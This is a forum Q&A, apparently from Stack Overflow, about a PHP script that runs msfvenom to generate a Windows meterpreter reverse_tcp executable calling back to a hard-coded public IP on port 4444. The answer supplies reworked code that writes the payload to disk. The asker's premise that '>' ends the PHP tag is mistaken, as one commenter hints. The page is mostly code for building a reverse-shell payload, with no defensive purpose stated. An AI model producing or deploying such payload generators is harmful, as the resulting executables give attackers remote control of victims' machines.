# Cant make > symbol in php

Tags: php, metasploit

I am trying to make a php script that generates a basic meterpreter reverse tcp payload.

```
<?php
$cmd = shell_exec('msfvenom -p windows/meterpreter/reverse_tcp
LHOST=46.101.255.58 LPORT=4444 -f exe > payloads/payload.exe');
echo $cmd;
?>
```

When i want to output the file i need to use the `>` symbol. This ends the php tag and doesn't generate the script. Is there any way i can use the `>` symbol in php without closing the tag?

Comment: Have you tried escaping it?

Comment: ...as in `-f exe \>`

Comment: How is `>` closing your PHP?

Answer (score 0):

Try this

```
<?php
$file = fopen("payloads/payload.exe","w");
$cmd = shell_exec('msfvenom -p windows/meterpreter/reverse_tcp
LHOST=46.101.255.58 LPORT=4444 -f exe');
echo $cmd;
fwrite($file,$cmd);
fclose($file);
?>
```

I would also encourage to not post your public ip address on the internet under your username.

Comment: probably you shouldn't echo the IP in your answer, too: this way, you may show OP how to omit it in the code in a reasonable manner